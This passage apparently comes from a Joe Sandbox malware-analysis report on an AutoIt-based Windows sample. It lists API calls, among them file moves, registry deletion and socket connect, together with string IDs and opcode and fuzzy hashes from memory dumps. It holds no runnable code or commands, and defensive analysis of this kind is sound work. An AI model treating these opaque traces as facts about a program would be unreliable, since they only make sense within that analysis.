                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                            • String ID: w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
                                                                                                                            • API String ID: 4210589936-4167011992
                                                                                                                            • Opcode ID: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
                                                                                                                            • Instruction ID: cee532b595ddfde912f0e750f3d9ac5fe25c3bfc445b1fca94dcf81959df6b8c
                                                                                                                            • Opcode Fuzzy Hash: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
                                                                                                                            • Instruction Fuzzy Hash: EE415439504115FFDF199F69C888AEDBB74FB05360F50435AF839921A0C7349EA4EB91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B
                                                                                                                              • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C736B7
                                                                                                                            • _wcscmp.LIBCMT ref: 00C736D3
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C736EB
                                                                                                                            • _wcscat.LIBCMT ref: 00C73733
                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00C7379F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 1377345388-1173974218
                                                                                                                            • Opcode ID: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
                                                                                                                            • Instruction ID: 0d9f67610b6ed8bde24fe0b4055bef6185da656cacecb82af0432503943d0caf
                                                                                                                            • Opcode Fuzzy Hash: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
                                                                                                                            • Instruction Fuzzy Hash: CF418E71108385AAC755EF64C841ADFB7E8EF89390F00492EB49AC3251EB34D789E752
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C972AA
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97351
                                                                                                                            • IsMenu.USER32(?), ref: 00C97369
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C973B1
                                                                                                                            • DrawMenuBar.USER32 ref: 00C973C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                            • Opcode ID: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
                                                                                                                            • Instruction ID: b7f1d3ef21a6bac3b76e5b4fadf4fb6523504cb14701058be773a82484fb9a20
                                                                                                                            • Opcode Fuzzy Hash: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
                                                                                                                            • Instruction Fuzzy Hash: 2F411675A55208EFDF20DF50D888A9EBBB8FB05310F14862AFD1597260D730AE50EB50
                                                                                                                            APIs
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C90FD4
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C90FFE
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C910B5
                                                                                                                              • Part of subcall function 00C90FA5: RegCloseKey.ADVAPI32(?), ref: 00C9101B
                                                                                                                              • Part of subcall function 00C90FA5: FreeLibrary.KERNEL32(?), ref: 00C9106D
                                                                                                                              • Part of subcall function 00C90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C91090
                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C91058
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 395352322-0
                                                                                                                            • Opcode ID: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
                                                                                                                            • Instruction ID: 299d30d8661cb0e6cc9f0331c195593baf1b0d79c9737f619410e2786ee646db
                                                                                                                            • Opcode Fuzzy Hash: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
                                                                                                                            • Instruction Fuzzy Hash: 75310C71901109BFDF159F90DC8EAFFB7BCEF08300F14116AE912E2151EA759F859AA0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C962EC
                                                                                                                            • GetWindowLongW.USER32(00EF5CD8,000000F0), ref: 00C9631F
                                                                                                                            • GetWindowLongW.USER32(00EF5CD8,000000F0), ref: 00C96354
                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C96386
                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C963B0
                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C963C1
                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C963DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2178440468-0
                                                                                                                            • Opcode ID: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
                                                                                                                            • Instruction ID: 1064cbef8cfb62fecf522721207b5a163cef01804cc4fad62ccda8c0794bd47f
                                                                                                                            • Opcode Fuzzy Hash: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
                                                                                                                            • Instruction Fuzzy Hash: EE31EE30644250AFDB218F29DC89F5937E1BB4A724F1901AAF521DB2F2CB71A941AB51
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB2E
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB54
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C6DB57
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C6DB75
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C6DB7E
                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DBA3
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C6DBB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3761583154-0
                                                                                                                            • Opcode ID: d429187faa2ddfa7685285e7e304c222b8acbb799c8f25b90937530135f01547
                                                                                                                            • Instruction ID: b558aefe60fad080c8f6e3b76a4bc524530c39d3e658a7fa0025557d92102f61
                                                                                                                            • Opcode Fuzzy Hash: d429187faa2ddfa7685285e7e304c222b8acbb799c8f25b90937530135f01547
                                                                                                                            • Instruction Fuzzy Hash: 9C21C732B00219AFDF20DFA9DC88DBF73ACEB49360B11816AF915DB250DA70DD418764
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6
                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C861C6
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C861D5
                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C8620E
                                                                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00C86217
                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C86221
                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C8624A
                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C86263
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 910771015-0
                                                                                                                            • Opcode ID: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
                                                                                                                            • Instruction ID: b2d599ba09da0174755bdc8610f80d94aee2eaf5c661fe0b50d373d475dedfa0
                                                                                                                            • Opcode Fuzzy Hash: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
                                                                                                                            • Instruction Fuzzy Hash: E631C131600108AFEF10AF64CC89BBE77ACEF46728F044069FD15E7291DB70AD459BA5
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                            • Opcode ID: 5bfbfbb41a860d5c9d8cfdab31022f914135c71f3dd844282459c3501898c2d7
                                                                                                                            • Instruction ID: 172847455c4f1d30ffe559b922a14bc6a092e481b05a63264df45f40774b117d
                                                                                                                            • Opcode Fuzzy Hash: 5bfbfbb41a860d5c9d8cfdab31022f914135c71f3dd844282459c3501898c2d7
                                                                                                                            • Instruction Fuzzy Hash: A52146B225412166D230BA34FC83FA773A8EF56344F10403DF8A686091EB519E83E2A5
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC09
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC2F
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C6DC32
                                                                                                                            • SysAllocString.OLEAUT32 ref: 00C6DC53
                                                                                                                            • SysFreeString.OLEAUT32 ref: 00C6DC5C
                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DC76
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C6DC84
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3761583154-0
                                                                                                                            • Opcode ID: 9675b313619a9700b23b425c17c34a11af6f7f482cf8aff13c4e10e5d3c2830c
                                                                                                                            • Instruction ID: 804afc0b7ccdf04df50efaa897a1b8425b75fc66320e07b16de68ff30dd1ca93
                                                                                                                            • Opcode Fuzzy Hash: 9675b313619a9700b23b425c17c34a11af6f7f482cf8aff13c4e10e5d3c2830c
                                                                                                                            • Instruction Fuzzy Hash: 5C213235704209BFDB209FA8DCC8EAB77ECEB09360B108126F915CB261D670DD81CB64
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                                                                              • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                                                                              • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C97632
                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C9763F
                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C9764A
                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C97659
                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C97665
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                            • Opcode ID: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
                                                                                                                            • Instruction ID: a2d45d209e2ce3bd550f3e4f4615a28902c557cd80310e7e33732b91f5cfef11
                                                                                                                            • Opcode Fuzzy Hash: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
                                                                                                                            • Instruction Fuzzy Hash: 5C11B6B1110219BFEF119F64CC85EEB7F6DEF08798F114115BA04A2050C6729C21DBA4
                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00C39AE6
                                                                                                                              • Part of subcall function 00C33187: EncodePointer.KERNEL32(00000000), ref: 00C3318A
                                                                                                                              • Part of subcall function 00C33187: __initp_misc_winsig.LIBCMT ref: 00C331A5
                                                                                                                              • Part of subcall function 00C33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C39EA0
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C39EB4
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C39EC7
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C39EDA
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C39EED
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C39F00
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C39F13
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C39F26
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C39F39
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C39F4C
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C39F5F
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C39F72
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C39F85
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C39F98
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C39FAB
                                                                                                                              • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C39FBE
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00C39AEB
                                                                                                                            • __mtterm.LIBCMT ref: 00C39AF4
                                                                                                                              • Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C56
                                                                                                                              • Part of subcall function 00C39B5C: _free.LIBCMT ref: 00C39C5D
                                                                                                                              • Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00CCEC00,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C7F
                                                                                                                            • __calloc_crt.LIBCMT ref: 00C39B19
                                                                                                                            • __initptd.LIBCMT ref: 00C39B3B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C39B42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
                                                                                                                            • Instruction ID: 21335bf51572bd45c5bd0b4136331fc639afa94b1a9aae279165b38df670159a
                                                                                                                            • Opcode Fuzzy Hash: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
                                                                                                                            • Instruction Fuzzy Hash: 2BF09A32A397116AE6347B74BC07B8E7690DF02738F200A2AF461C60D2EFF0894161A0
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C33F85), ref: 00C34085
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00C3408C
                                                                                                                            • EncodePointer.KERNEL32(00000000), ref: 00C34097
                                                                                                                            • DecodePointer.KERNEL32(00C33F85), ref: 00C340B2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                                            • Opcode ID: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
                                                                                                                            • Instruction ID: abce74a021f83dab232709fe7401bd8d369e0d4d24b2c653e0392e175223588b
                                                                                                                            • Opcode Fuzzy Hash: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
